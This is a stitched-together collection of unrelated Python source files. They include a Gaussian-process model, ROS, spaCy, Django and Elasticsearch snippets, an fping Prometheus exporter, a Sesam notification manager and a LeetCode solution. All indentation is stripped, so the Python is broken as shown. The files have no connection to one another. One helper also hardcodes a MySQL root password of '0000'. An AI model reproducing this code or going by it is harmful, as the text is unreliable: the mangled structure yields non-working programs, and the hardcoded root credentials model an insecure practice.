toSample.append(self.mean)
if not self.noiseless:
self.params['noise'] = noise_kernel.noise
toSample.append(noise_kernel.noise)
if len(toSample) > 0:
self._samplers.append(SliceSampler(*toSample, compwise=False, thinning=self.options['thinning']))
def _burn_samples(self, num_samples):
if num_samples == 0:
return
# logging.debug('GPClassifer: burning %s: ' % ', '.join(self.params.keys()))
# logging.debug('%05d/%05d' % (0, num_samples))
logging.debug(' Burning %d samples...' % num_samples)
for i in xrange(num_samples):
# if self.options['verbose']:
# logging.debug('\b'*11+'%05d/%05d' % (i, num_samples))
for sampler in self._samplers:
sampler.sample(self)
self.chain_length += 1
# if self.options['verbose']:
# logging.debug('\n')
def _collect_samples(self, num_samples):
hypers_list = []
for sampler in self._samplers:
logging.debug(' Sampling %d samples of %s with %s' % (num_samples, ', '.join(['%s(%d)'%(param.name, param.size()) for param in sampler.params]), sampler.__class__.__name__))
logging.debug('')
for i in xrange(num_samples):
for sampler in self._samplers:
sampler.sample(self)
hypers_list.append(self.to_dict()['hypers'])
self.chain_length += 1
self._hypers_list = hypers_list
def _collect_fantasies(self, pending):
fantasy_values_list = []
for i in xrange(self.num_states):
self.set_state(i)
fantasy_vals = self._fantasize(pending)
if fantasy_vals.ndim == 1:
fantasy_vals = fantasy_vals[:,np.newaxis]
fantasy_values_list.append(fantasy_vals)
return fantasy_values_list
def _fantasize(self, pend):
if self._use_mean_if_single_fantasy and self.options['num_fantasies'] == 1:
predicted_mean, cov = self.predict(pend)
return predicted_mean
else:
npr.set_state(self._random_state)
return self.sample_from_posterior_given_hypers_and_data(pend, self.options['num_fantasies'])
@property
def inputs(self):
if self.pending is None or len(self._fantasy_values_list) < self.num_states:
return self._inputs
else:
return np.vstack((self._inputs, self.pending)) # Could perhaps cache this to make it faster.
@property
def observed_inputs(self):
return self._inputs
@property
def values(self):
if self.pending is None or len(self._fantasy_values_list) < self.num_states:
return self._values
if self.options['num_fantasies'] == 1:
return np.append(self._values, self._fantasy_values_list[self.state].flatten(), axis=0)
else:
return np.append(np.tile(self._values[:,None], (1,self.options['num_fantasies'])), self._fantasy_values_list[self.state], axis=0)
@property
def observed_values(self):
return self._values
@property
def kernel(self):
if self.noiseless:
return self._kernel
else:
return self._kernel_with_noise if self._kernel_with_noise is not None else self._kernel
@property
def noiseless_kernel(self):
return self._kernel
@property
def has_data(self):
return self.observed_inputs is not None and self.observed_inputs.size > 0
def caching(self):
if not self.options['caching'] or self.num_states <= 0:
return False
# For now this only computes the cost of storing the Cholesky decompositions.
cache_mem_usage = (self._inputs.shape[0]**2) * self.num_states * 8. # Each double is 8 bytes.
if cache_mem_usage > self.max_cache_bytes:
logging.debug('Max memory limit of %d bytes reached. Not caching intermediate computations.' % self.max_cache_bytes)
return False
return True
def set_state(self, state):
self.state = state
self._set_params_from_dict(self._hypers_list[state])
def to_dict(self):
gp_dict = {'hypers' : {}}
for name, hyper in self.params.iteritems():
gp_dict['hypers'][name] = hyper.value
# I don't understand why this is stored...? as soon as you call fit
# it gets set to 0 anyway.
gp_dict['chain length'] = self.chain_length
return gp_dict
def from_dict(self, gp_dict):
self._set_params_from_dict(gp_dict['hypers'])
self.chain_length = gp_dict['chain length']
def reset_params(self):
for param in self.params.values():
param.reset_value() # set to default
# if fit_hypers is False, then we do not perform MCMC and use whatever we have
# in other words, we are just changing setting the data if fit_hypers is False
def fit(self, inputs, values, pending=None, hypers=None, reburn=False, fit_hypers=True):
# Set the data for the GP
self._inputs = inputs
self._values = values
if self.options['mcmc_iters'] == 0: # do not do MCMC
fit_hypers = False
self._fantasy_values_list = [] # fantasy of pendings
# Initialize the GP with hypers if provided, or else set them to their default
if hypers:
self.from_dict(hypers)
else:
self.reset_params()
if fit_hypers:
# self._hypers_list = [] # samples hypers
# self._cache_list = [] # caching cholesky
self.chain_length = 0 # chain of hypers
# Burn samples (if needed)
num_samples_to_burn = self.options['burnin'] if reburn or self.chain_length < self.options['burnin'] else 0
self._burn_samples(num_samples_to_burn)
# Now collect some samples (sets self._hypers_list)
self._collect_samples(self.options['mcmc_iters'])
# Now we have more states
self.num_states = self.options['mcmc_iters']
else:
if len(self._hypers_list) == 0:
# Just use the current hypers as the only state
self._hypers_list = [self.to_dict()['hypers']]
self.num_states = 1
self._cache_list = [] # i think you need to do this before collecting fantasies...
# Set pending data and generate corresponding fantasies
if pending is not None:
self.pending = pending
self._fantasy_values_list = self._collect_fantasies(pending)
# Actually compute the cholesky and all that stuff -- this is the "fitting"
# If there is new data (e.g. pending stuff) but fit_hypers is False
# we still want to do this... because e.g. new pending stuff does change the cholesky.
if self.caching() and self.has_data:
self._prepare_cache()
# Set the hypers to the final state of the chain
self.set_state(len(self._hypers_list)-1)
return self.to_dict()
def log_likelihood(self):
"""
GP Marginal likelihood
"""
if not self.has_data:
return 0.0
# cannot do caching of chol here because we are evaluating different length scales
# -- nothing to cache yet
cov = self.kernel.cov(self.observed_inputs)
chol = spla.cholesky(cov, lower=True)
solve = spla.cho_solve((chol, True), self.observed_values - self.mean.value)
complexity_penalty = -np.sum(np.log(np.diag(chol)))
data_fit_term = -0.5*np.dot(self.observed_values - self.mean.value, solve)
return complexity_penalty + data_fit_term
# Uses the identity that log det A = log prod diag chol A = sum log diag chol A
# return -np.sum(np.log(np.diag(chol)))-0.5*np.dot(self.observed_values - self.mean.value, solve)
# cholK is only used for the Predictive Entropy Search acquisition function
# Please ignore it otherwise...
def predict(self, pred, full_cov=False, compute_grad=False):
inputs = self.inputs
values = self.values
if pred.shape[1] != self.num_dims:
raise Exception("Dimensionality of test points is %d but dimensionality given at init time is %d." % (pred.shape[1], self.num_dims))
# Special case if there is no data yet --> predict from the prior
if not self.has_data:
return self.predict_from_prior(pred, full_cov, compute_grad)
# The primary covariances for prediction.
cand_cross = self.noiseless_kernel.cross_cov(inputs, pred)
if self.caching() and len(self._cache_list) == self.num_states:
chol = self._cache_list[self.state]['chol']
alpha = self._cache_list[self.state]['alpha']
else:
chol = spla.cholesky(self.kernel.cov(self.inputs), lower=True)
alpha = spla.cho_solve((chol, True), self.values - self.mean.value)
# Solve the linear systems.
# Note: if X = LL^T, cho_solve performs X\b whereas solve_triangular performs L\b
beta = spla.solve_triangular(chol, cand_cross, lower=True)
# Predict the marginal means at candidates.
func_m = np.dot(cand_cross.T, alpha) + self.mean.value
if full_cov:
# Return the covariance matrix of the pred inputs,
# rather than just the individual variances at each input
cand_cov = self.noiseless_kernel.cov(pred)
func_v = cand_cov - np.dot(beta.T, beta)
else:
cand_cov = self.noiseless_kernel.diag_cov(pred) # it is slow to generate this diagonal matrix... for stationary kernels you don't need to do this
func_v = cand_cov - np.sum(beta**2, axis=0)
if not compute_grad:
return func_m, func_v
grad_cross = self.noiseless_kernel.cross_cov_grad_data(inputs, pred)
grad_xp_m = np.tensordot(np.transpose(grad_cross, (1,2,0)), alpha, 1)
# this should be faster than (and equivalent to) spla.cho_solve((chol, True),cand_cross))
gamma = spla.solve_triangular(chol.T, beta, lower=False)
# Using sum and multiplication and summing instead of matrix multiplication
# because I only want the diagonals of the gradient of the covariance matrix, not the whole thing
grad_xp_v = -2.0*np.sum(gamma[:,:,np.newaxis] * grad_cross, axis=0)
# Not very important -- just to make sure grad_xp_v.shape = grad_xp_m.shape
if values.ndim > 1:
grad_xp_v = grad_xp_v[:,:,np.newaxis]
# In case this is a function over a 1D input,
# return a numpy array rather than a float
if np.ndim(grad_xp_m) == 0:
grad_xp_m = np.array([grad_xp_m])
grad_xp_v = np.array([grad_xp_v])
return func_m, func_v, grad_xp_m, grad_xp_v
def predict_from_prior(self, pred, full_cov=False, compute_grad=False):
mean = self.mean.value * np.ones(pred.shape[0])
if full_cov:
cov = self.noiseless_kernel.cov(pred)
return mean, cov
elif compute_grad:
var = self.noiseless_kernel.diag_cov(pred)
grad = np.zeros((pred.shape[0], self.num_dims))
return mean, var, grad, grad
else:
var = self.noiseless_kernel.diag_cov(pred)
return mean, var
# -------------------------------------------------------- #
# #
# Below are four sampling routines. Each one has the same #
# signature. "pred" contains the inputs at which we would #
# like to sample. "n_samples" is the number of samples. If #
# n_samples is 1 we return a squeezed vector. "joint" is a #
# boolean indicating whether we want to sample jointly. #
# joint=True means sample normally. joint=False means #
# sample from the conditional distribution at each input, #
# and just compute them all together in a vectorized way. #
# #
# -------------------------------------------------------- #
# Sample from p(y | theta), where theta is given by the current state
def sample_from_prior_given_hypers(self, pred, n_samples=1, joint=True):
N_pred = pred.shape[0]
if joint:
mean = self.mean.value
cov = self.noiseless_kernel.cov(pred) # Gaussian likelihood happens here
return npr.multivariate_normal(mean*np.ones(N_pred), cov, size=n_samples).T.squeeze()
else:
mean = self.mean.value
var = self.noiseless_kernel.diag_cov(pred)
return np.squeeze(mean + npr.randn(N_pred, n_samples) * np.sqrt(var)[:,None])
# Sample from p(y)
# This is achieved by first sampling theta from its hyperprior p(theta), and then
# sampling y from p(y | theta)
def sample_from_prior(self, pred, n_samples=1, joint=True):
fants = np.zeros((pred.shape[0], n_samples))
for i in xrange(n_samples):
for param in self.params:
self.params[ param ].sample_from_prior() # sample from hyperpriors and set value
fants[:,i] = self.sample_from_prior_given_hypers(pred, joint)
return fants.squeeze() # squeeze in case n_samples=1
# Terminology: does "posterior" usually refer to p(theta | data) ?
# By "posterior" I guess I mean "posterior predictive", p(y | data)
# Sample from p(y | theta, data), where theta is given by the current state
def sample_from_posterior_given_hypers_and_data(self, pred, n_samples=1, joint=True):
if joint:
predicted_mean, cov = self.predict(pred, full_cov=True) # This part depends on the data
return npr.multivariate_normal(predicted_mean, cov, size=n_samples).T.squeeze()
else:
predicted_mean, var = self.predict(pred, full_cov=False) # This part depends on the data
return np.squeeze(predicted_mean[:,None] + npr.randn(pred.shape[0], n_samples) * np.sqrt(var)[:,None])
# Sample from p(y | data), integrating out the hyperparameters (theta)
# This is achieved by first sampling theta from p(theta | data), and then
# sampling y from p(y | theta, data)
def sample_from_posterior_given_data(self, pred, n_samples=1, joint=True):
fants = np.zeros((pred.shape[0], n_samples))
for i in xrange(n_samples):
# Sample theta from p(theta | data)
self.generate_sample(1)
# Sample y from p(y | theta, data)
fants[:,i] = self.sample_from_posterior_given_hypers_and_data(pred, joint)
return fants.squeeze() # squeeze in case n_samples=1
# -------------------------------------------------------- #
# #
# End of sampling functions #
# #
# -------------------------------------------------------- #
# pi = probability that the latent function value is greater than or equal to C
# This is evaluated separately at each location in pred
def pi(self, pred, compute_grad=False, C=0):
if not compute_grad:
mean, sigma2 = self.predict(pred, compute_grad=False)
else:
mean, sigma2, g_m_x, g_v_x = self.predict(pred, compute_grad=True)
sigma = np.sqrt(sigma2)
C_minus_m = C-mean
# norm.sf = 1 - norm.cdf
prob = sps.norm.sf(C_minus_m/sigma)
if not compute_grad:
return prob
else:
# Gradient of pi w.r.t. GP mean
g_p_m = sps.norm.pdf( C_minus_m / sigma ) / sigma
# Gradient of pi w.r.t. GP variance (equals grad w.r.t. sigma / (2*sigma))
g_p_v = sps.norm.pdf( C_minus_m / sigma ) * C_minus_m / sigma2 / (2*sigma)
# Total derivative of pi w.r.t. inputs
grad_p = g_p_m[:,np.newaxis] * g_m_x + g_p_v[:,np.newaxis] * g_v_x
return prob, grad_p
|
import mysql.connector
def conn():
conn = mysql.connector.connect(
host = "127.0.0.1",
user = "root",
password = "0000",
database = "future",
)
return conn |
from itertools import tee
from spacy.tokens import Doc
from spacy.tokens import Token
from spacy.language import Language
from text_complexity_analyzer_cm.constants import ACCEPTED_LANGUAGES
Doc.set_extension('feature_count', default=None, force=True)
@Language.factory('feature counter')
class FeatureCounter:
def __init__(self, nlp, name, language) -> None:
if not language in ACCEPTED_LANGUAGES:
raise ValueError(f'Language {language} is not supported yet')
self.language = language
self.counter_function = None
def __call__(self, doc: Doc) -> Doc:
'''
This method will calculate the the 'counter_function' on a text. Said function will be handle different counting.
Parameters:
doc(Doc): A Spacy document.
'''
if self.counter_function is None:
raise AttributeError('No function to count features was provided.')
# Prepare iterators to extract previous and current sentence pairs.
doc._.feature_count = self.counter_function(doc)
return doc |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import glob
class image_converter:
def __init__(self):
rospy.init_node('image_converter', anonymous=True)
self.image_pub = rospy.Publisher("/thermal_yolo/image",Image,queue_size=1)
self.bridge = CvBridge()
#self.camera = cv2.VideoCapture(0)
#self.image_list = glob.glob("/home/sam/Downloads/FLIR_ADAS_1_3/train/Annotated_thermal_8_bit/*.jpeg")
self.image_list = glob.glob("/home/sam/images/*.jpeg")
self.rate = rospy.Rate(10)
def mainloop(self):
try:
for image_file in self.image_list:
image = cv2.imread(image_file)
#print(image)
try:
self.image_pub.publish(self.bridge.cv2_to_imgmsg(image, "bgr8"))
self.rate.sleep()
except CvBridgeError as e:
print(e)
except KeyboardInterrupt:
print("Shutting down")
cv2.destroyAllWindows()
x = image_converter()
x.mainloop()
|
#!/usr/bin/env python3
# Copyright 2021 Flant JSC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import prometheus_client
import re
import statistics
import os, sys
import json
import glob
FPING_CMDLINE = "/usr/sbin/fping -p 1000 -C 30 -B 1 -q -r 1".split(" ")
FPING_REGEX = re.compile(r"^(\S*)\s*: (.*)$", re.MULTILINE)
CONFIG_PATH = "/config/targets.json"
registry = prometheus_client.CollectorRegistry()
prometheus_exceptions_counter = \
prometheus_client.Counter('kube_node_ping_exceptions', 'Total number of exceptions', [], registry=registry)
prom_metrics_cluster = {"sent": prometheus_client.Counter('kube_node_ping_packets_sent_total',
'ICMP packets sent',
['destination_node', 'destination_node_ip_address'],
registry=registry),
"received": prometheus_client.Counter('kube_node_ping_packets_received_total',
'ICMP packets received',
['destination_node', 'destination_node_ip_address'],
registry=registry),
"rtt": prometheus_client.Counter('kube_node_ping_rtt_milliseconds_total',
'round-trip time',
['destination_node', 'destination_node_ip_address'],
registry=registry),
"min": prometheus_client.Gauge('kube_node_ping_rtt_min', 'minimum round-trip time',
['destination_node', 'destination_node_ip_address'],
registry=registry),
"max": prometheus_client.Gauge('kube_node_ping_rtt_max', 'maximum round-trip time',
['destination_node', 'destination_node_ip_address'],
registry=registry),
"mdev": prometheus_client.Gauge('kube_node_ping_rtt_mdev',
'mean deviation of round-trip times',
['destination_node', 'destination_node_ip_address'],
registry=registry)}
prom_metrics_external = {"sent": prometheus_client.Counter('external_ping_packets_sent_total',
'ICMP packets sent',
['destination_name', 'destination_host'],
registry=registry),
"received": prometheus_client.Counter('external_ping_packets_received_total',
'ICMP packets received',
['destination_name', 'destination_host'],
registry=registry),
"rtt": prometheus_client.Counter('external_ping_rtt_milliseconds_total',
'round-trip time',
['destination_name', 'destination_host'],
registry=registry),
"min": prometheus_client.Gauge('external_ping_rtt_min', 'minimum round-trip time',
['destination_name', 'destination_host'],
registry=registry),
"max": prometheus_client.Gauge('external_ping_rtt_max', 'maximum round-trip time',
['destination_name', 'destination_host'],
registry=registry),
"mdev": prometheus_client.Gauge('external_ping_rtt_mdev',
'mean deviation of round-trip times',
['destination_name', 'destination_host'],
registry=registry)}
def validate_envs():
envs = {"MY_NODE_NAME": os.getenv("MY_NODE_NAME"), "PROMETHEUS_TEXTFILE_DIR": os.getenv("PROMETHEUS_TEXTFILE_DIR"),
"PROMETHEUS_TEXTFILE_PREFIX": os.getenv("PROMETHEUS_TEXTFILE_PREFIX")}
for k, v in envs.items():
if not v:
raise ValueError("{} environment variable is empty".format(k))
return envs
@prometheus_exceptions_counter.count_exceptions()
def compute_results(results):
computed = {}
matches = FPING_REGEX.finditer(results)
for match in matches:
host = match.group(1)
ping_results = match.group(2)
if "duplicate" in ping_results:
continue
splitted = ping_results.split(" ")
if len(splitted) != 30:
raise ValueError("ping returned wrong number of results: \"{}\"".format(splitted))
positive_results = [float(x) for x in splitted if x != "-"]
if len(positive_results) > 0:
computed[host] = {"sent": 30, "received": len(positive_results),
"rtt": sum(positive_results),
"max": max(positive_results), "min": min(positive_results),
"mdev": statistics.pstdev(positive_results)}
else:
computed[host] = {"sent": 30, "received": len(positive_results), "rtt": 0,
"max": 0, "min": 0, "mdev": 0}
if not len(computed):
raise ValueError("regex match\"{}\" found nothing in fping output \"{}\"".format(FPING_REGEX, results))
return computed
@prometheus_exceptions_counter.count_exceptions()
def call_fping(ips):
cmdline = FPING_CMDLINE + ips
process = subprocess.run(cmdline, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True)
if process.returncode == 3:
raise ValueError("invalid arguments: {}".format(cmdline))
if process.returncode == 4:
raise OSError("fping reported syscall error: {}".format(process.stderr))
return process.stdout
envs = validate_envs()
files = glob.glob(envs["PROMETHEUS_TEXTFILE_DIR"] + "*")
for f in files:
os.remove(f)
labeled_prom_metrics = {"cluster_targets": [], "external_targets": []}
while True:
with open(CONFIG_PATH, "r") as f:
config = json.loads(f.read())
config["external_targets"] = [] if config["external_targets"] is None else config["external_targets"]
for target in config["external_targets"]:
target["name"] = target["host"] if "name" not in target.keys() else target["name"]
if labeled_prom_metrics["cluster_targets"]:
for metric in labeled_prom_metrics["cluster_targets"]:
if (metric["node_name"], metric["ip"]) not in [(node["name"], node["ipAddress"]) for node in config['cluster_targets']]:
for k, v in prom_metrics_cluster.items():
v.remove(metric["node_name"], metric["ip"])
if labeled_prom_metrics["external_targets"]:
for metric in labeled_prom_metrics["external_targets"]:
if (metric["target_name"], metric["host"]) not in [(target["name"], target["host"]) for target in config['external_targets']]:
for k, v in prom_metrics_external.items():
v.remove(metric["target_name"], metric["host"])
labeled_prom_metrics = {"cluster_targets": [], "external_targets": []}
for node in config["cluster_targets"]:
metrics = {"node_name": node["name"], "ip": node["ipAddress"], "prom_metrics": {}}
for k, v in prom_metrics_cluster.items():
metrics["prom_metrics"][k] = v.labels(node["name"], node["ipAddress"])
labeled_prom_metrics["cluster_targets"].append(metrics)
for target in config["external_targets"]:
metrics = {"target_name": target["name"], "host": target["host"], "prom_metrics": {}}
for k, v in prom_metrics_external.items():
metrics["prom_metrics"][k] = v.labels(target["name"], target["host"])
labeled_prom_metrics["external_targets"].append(metrics)
out = call_fping([prom_metric["ip"] for prom_metric in labeled_prom_metrics["cluster_targets"]] + \
[prom_metric["host"] for prom_metric in labeled_prom_metrics["external_targets"]])
computed = compute_results(out)
for dimension in labeled_prom_metrics["cluster_targets"]:
result = computed[dimension["ip"]]
dimension["prom_metrics"]["sent"].inc(result["sent"])
dimension["prom_metrics"]["received"].inc(result["received"])
dimension["prom_metrics"]["rtt"].inc(result["rtt"])
dimension["prom_metrics"]["min"].set(result["min"])
dimension["prom_metrics"]["max"].set(result["max"])
dimension["prom_metrics"]["mdev"].set(result["mdev"])
for dimension in labeled_prom_metrics["external_targets"]:
if dimension["host"] in computed:
result = computed[dimension["host"]]
else:
sys.stderr.write("ERROR: fping hasn't reported results for host '" + dimension["host"] + "'. Possible DNS problems. Skipping host.\n")
sys.stderr.flush()
continue
dimension["prom_metrics"]["sent"].inc(result["sent"])
dimension["prom_metrics"]["received"].inc(result["received"])
dimension["prom_metrics"]["rtt"].inc(result["rtt"])
dimension["prom_metrics"]["min"].set(result["min"])
dimension["prom_metrics"]["max"].set(result["max"])
dimension["prom_metrics"]["mdev"].set(result["mdev"])
prometheus_client.write_to_textfile(
envs["PROMETHEUS_TEXTFILE_DIR"] + envs["PROMETHEUS_TEXTFILE_PREFIX"] + envs["MY_NODE_NAME"] + ".prom", registry)
|
#!/usr/bin/env python
import json
import logging
import os
import re
import sys
from time import sleep
import sesamclient
import fnmatch
from portal import PortalConnection
# define required and optional environment variables
required_env_vars = ["node_endpoint", "jwt", "rules"]
optional_env_vars = ["loglevel", "local_test", "interval", "notification_dataset", "microservice_logging"]
def str_to_bool(string_input):
return str(string_input).lower() == "true"
class AppConfig(object):
pass
config = AppConfig()
# load variables
missing_env_vars = list()
for env_var in required_env_vars:
value = os.getenv(env_var)
if not value:
missing_env_vars.append(env_var)
setattr(config, env_var, value)
for env_var in optional_env_vars:
value = os.getenv(env_var)
if value:
setattr(config, env_var, value)
# Define logger
if hasattr(config, "microservice_logging"):
if str_to_bool(config.microservice_logging):
format_string = ' - %(name)s - %(levelname)s - %(message)s'
else:
format_string = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logger = logging.getLogger('NotificationManager')
stdout_handler = logging.StreamHandler()
stdout_handler.setFormatter(logging.Formatter(format_string))
logger.addHandler(stdout_handler)
logger.setLevel({"INFO": logging.INFO,
"DEBUG": logging.DEBUG,
"WARN": logging.WARNING,
"ERROR": logging.ERROR}.get(os.getenv("loglevel", "INFO"))) # Default loglevel: INFO
if len(missing_env_vars) != 0:
logger.error(f"Missing the following required environment variable(s) {missing_env_vars}")
sys.exit(1)
if hasattr(config, "local_test"):
if str_to_bool(config.local_test):
with open('example_config.json', 'r') as f:
raw_example = f.read()
rules = json.loads(raw_example)
else:
try:
rules = json.loads(config.rules)
except ValueError:
logger.error("The 'rules' environment variable doesn't contain valid Json.")
sys.exit(1)
# Todo: Validate all rules. Should contain: 'template', 'pipes'
def is_pattern_match(pattern, input_string):
regular_expression = fnmatch.translate(pattern)
compiled_pattern = re.compile(regular_expression)
match = compiled_pattern.match(input_string)
return match is not None
def get_matching_rules(pipe_id):
pattern_matched_rules = list()
for rule_definition in rules:
rule_patterns = rule_definition.get("pipes")
if rule_patterns:
for pattern in rule_patterns:
if is_pattern_match(pattern, pipe_id):
pattern_matched_rules.append(rule_definition.get("template").copy())
return pattern_matched_rules
def push_unknown_notification_rules(connection, rules):
if hasattr(config, "notification_dataset") and config.notification_dataset != "":
logger.info("Pushing unknown notification rules to notifier dataset")
# TODO: should look into getting a better retry mechanism from the sesam client
retry_count = 0
success = False
while retry_count < 3 and not success:
try:
connection.get_pipe(config.notification_dataset).post_entities(rules)
success = True
except:
retry_count += 1
if retry_count < 3 and not success:
sleep(3)
else:
logger.error(f"Failed to send unknown notification rules to dataset. Dumping to log.\n{rules}")
else:
logger.info(f"No unknown notification warning dataset found. Dumping rules to log:\n{rules}")
# Create connections
node_conn = sesamclient.Connection(
sesamapi_base_url=config.node_endpoint,
jwt_auth_token=config.jwt,
timeout=60)
portal_conn = PortalConnection(config.jwt)
subscription_id = node_conn.get_license().get("_id")
logger.debug(f"Node subscription_id: '{subscription_id}'")
while True:
# get list of all pipes from node
logger.info("Starting check for updated notification rules.")
pipes = node_conn.get_pipes()
manually_created = dict()
for pipe in pipes:
# get rules from portal endpoint
logger.debug("Checking for rules matching pipe '{}'".format(pipe.id))
matched_rules = list()
matched_rules = get_matching_rules(pipe.id)
if matched_rules:
logger.debug("Found {} rules matching pipe '{}'.".format(len(matched_rules), pipe.id))
existing_rules = portal_conn.get_pipe_notification_rules(subscription_id, pipe.id)
update_count = 0
matched_existence_rules = list()
for rule in matched_rules:
if rule:
try:
rule["recipients"][0]["id"] = (rule["recipients"][0]["id"]).replace("<SUBSCRIPTION_ID>", subscription_id)
except KeyError:
logger.error("Misconfigured rule. Make sure to follow the required layout from the example.")
continue
same_name_existing_rule = None
for existing_rule in existing_rules:
if existing_rule.get("name") == rule.get("name"):
same_name_existing_rule = existing_rule
rule["id"] = existing_rule.get("id")
matched_existence_rules.append(rule)
if not rule == same_name_existing_rule:
if same_name_existing_rule:
logger.info("Updating existing rule '{}' for pipe '{}'".format(rule.get("name"), pipe.id))
portal_conn.update_pipe_notification_rule(subscription_id, pipe.id, rule.get("id"), rule)
else:
logger.info("Creating new rule '{}' for pipe '{}'".format(rule.get("name"), pipe.id))
portal_conn.add_pipe_notification_rule(subscription_id, pipe.id, rule)
update_count += 1
if update_count == 0:
logger.debug("No new/changed rules found for pipe '{}'".format(pipe.id))
# check for rules created directly on the node that's not present in the microservice config
manually_created_rules = list()
for existing in existing_rules:
if existing not in matched_existence_rules:
manually_created_rules.append(existing)
if len(manually_created_rules) > 0:
for manually in manually_created_rules:
rule_name = manually["name"]
logger.warning("Unregistered notification rule '{}' found on node for pipe '{}'"
.format(rule_name, pipe.id))
if rule_name not in manually_created:
manually_created[rule_name] = {
"pipes": [pipe.id],
"body": manually
}
else:
manually_created[rule_name]["pipes"] = manually_created[rule_name]["pipes"] + [pipe.id]
# Push unknown notification rules to node dataset in order to email developers about uncommited rules
if manually_created:
sesam_entities = list()
for rule_name, value in manually_created.items():
sesam_entities.append({
"_id": rule_name,
"pipes_with_rule": value["pipes"],
"body": value["body"]
})
push_unknown_notification_rules(node_conn, sesam_entities)
logger.info("Finished notification check")
sleep_interval = config.interval if hasattr(config, "interval") else 3600
logger.info(f"Going to sleep. Will check again in {sleep_interval} seconds")
sleep(int(sleep_interval))
|
import json
from elasticsearch import Elasticsearch, helpers
from collections import OrderedDict
from requests_html import HTMLSession
import urllib.parse as url_parse
index_name = "raw"
doc_type = "twitter"
es = Elasticsearch("http://127.0.0.1:9200/") #localhost = 127.0.0.1:9200
get_data = es.get(index = index_name, doc_type = doc_type,id = 1)
print(get_data['_source']) |
__author__ = "Vanessa Sochat"
__copyright__ = "Copyright 2021, Vanessa Sochat"
__license__ = "Apache-2.0 OR MIT"
# This is an example for doing a splicing (preliminary) analysis to make
# a prediction about whether a package will build or not. This means:
# 1. Starting with a package of interest
# 2. Getting all specs for that package
# 3. For each spec, finding all the dependencies with install file and symbolator results
# 4. Doing a diff between the working symbol space and the anticipated symbol space
# 5. Making a prediction based on not having new missing symbols!
## IMPORTANT: this is server itensive, and likely won't work when there are
# a large number of specs. Instead, the result files should be downloaded
# and parsed locally (an example will follow)
import os
import sys
import json
here = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(here))
from spackmoncli import SpackMonitorClient
# defaults to host=http:127.0.0.1 and prefix=ms1
client = SpackMonitorClient()
# Here is a package of interest! Let's get a spec for it.
specs = client.get_specs_by_name("curl")
# Keep a list of predictions
predictions = []
# We will loop through specs, but stop after we find one with analyzer results
for spec in specs:
# Now for the spec we need to get a listing of analyzer results!
# We can do a splice analysis for any spec that has symbolator-json
results = client.get_analyzer_results_spec(spec["id"], "symbolator")
# Here is what a results list looks like!
# [{'filename': 'bin/curl', 'id': 2160, 'analyzer': 'symbolator', 'name': 'symbolator-json'}, ... ]
if results:
for result in results:
# We are only interested in splicig for binaries (e.g., stuff in bin)
if not result["filename"].startswith("bin"):
continue
# Get dependency specs
contender_specs = client.get_splice_contenders(result["id"])
for contender in contender_specs:
print(
"Performing splicing for %s with %s %s %s"
% (
result["filename"],
contender["name"],
contender["version"],
contender["full_hash"],
)
)
predictions.append(
client.get_splice_predictions(result["id"], contender["id"])
)
if predictions:
break
print("inspect predictions:")
import IPython
IPython.embed()
# Do we have a results directory?
results_dir = os.path.join(here, "results")
if not os.path.exists(results_dir):
os.mkdir(results_dir)
# Optionally save results to file
with open(os.path.join(results_dir, "splice_analysis_results.json"), "w") as fd:
fd.write(json.dumps(predictions, indent=4))
|
from typing import List
class Solution:
def removeDuplicates(self, s: str, k: int) -> str:
stack =[]
for ch in s:
if len(stack) != 0 and stack[-1][0] == ch:
tmp = stack.pop()
if tmp[1]+1 != k:
stack.append([tmp[0],tmp[-1]+1])
else:
stack.append([ch,1])
res=""
while len(stack)!=0:
tmp = stack.pop()
for i in range(tmp[1]):
res=tmp[0]+res
return res
A = Solution()
s = "deeedbbcccbdaa"
k = 3
print(A.removeDuplicates(s,k))
|
from django.urls import path
from .views import BookListView, WriterListView, BookSubListView, WriterSubListView, \
SearchByGenres, CreateWriterView, CreateBookView, DeleteBookView, DeleteWriterView
urlpatterns = [
path('books/', BookListView.as_view(), name='Book'),
path('book/<item>/', BookSubListView.as_view(), name='BookSubList'),
path('writers/', WriterListView.as_view(), name='Writer'),
path('writer/<item>/', WriterSubListView.as_view(), name='BookSubList'),
path('Genre/<item>/', SearchByGenres.as_view(), name='SearchByGenres'),
path('createwriter/', CreateWriterView.as_view(), name='CreateWriterView'),
path('createbook/', CreateBookView.as_view(), name='CreateBookView'),
path('deletebook/<int:id>/', DeleteBookView.as_view(), name='DeleteBookView'),
path('deletewriter/<int:id>/', DeleteWriterView.as_view(), name='DeleteWriterView'),
]
|
from django.test import TestCase
from testly.models import TestRun as Run
class TestRuns(TestCase):
def setUp(self):
self.test_run1 = Run.objects.create(requested_by='Jenkins', path='test_runs.py', environment=1)
self.test_run2 = Run.objects.create(requested_by='Jenkins', path='test_runs.py', environment=2)
def test_runs_list(self):
response = self.client.get('/runs')
assert response.status_code == 200
run_ids = [run['id'] for run in response.json()['results']]
assert set(run_ids) == {self.test_run1.id, self.test_run2.id}
def test_run_detail(self):
response = self.client.get('/runs/{}'.format(self.test_run1.id))
assert response.status_code == 200
assert response.json()['id'] == self.test_run1.id
|
""" Various generic env utilties. """
def center_crop_img(img, crop_zoom):
""" crop_zoom is amount to "zoom" into the image. E.g. 2.0 would cut out half of the width,
half of the height, and only give the center. """
raw_height, raw_width = img.shape[:2]
center = raw_height // 2, raw_width // 2
crop_size = raw_height // crop_zoom, raw_width // crop_zoom
min_y, max_y = int(center[0] - crop_size[0] // 2), int(center[0] + crop_size[0] // 2)
min_x, max_x = int(center[1] - crop_size[1] // 2), int(center[1] + crop_size[1] // 2)
img_cropped = img[min_y:max_y, min_x:max_x]
return img_cropped
def crop_img(img, relative_corners):
""" relative_corners are floats between 0 and 1 designating where the corners of a crop box
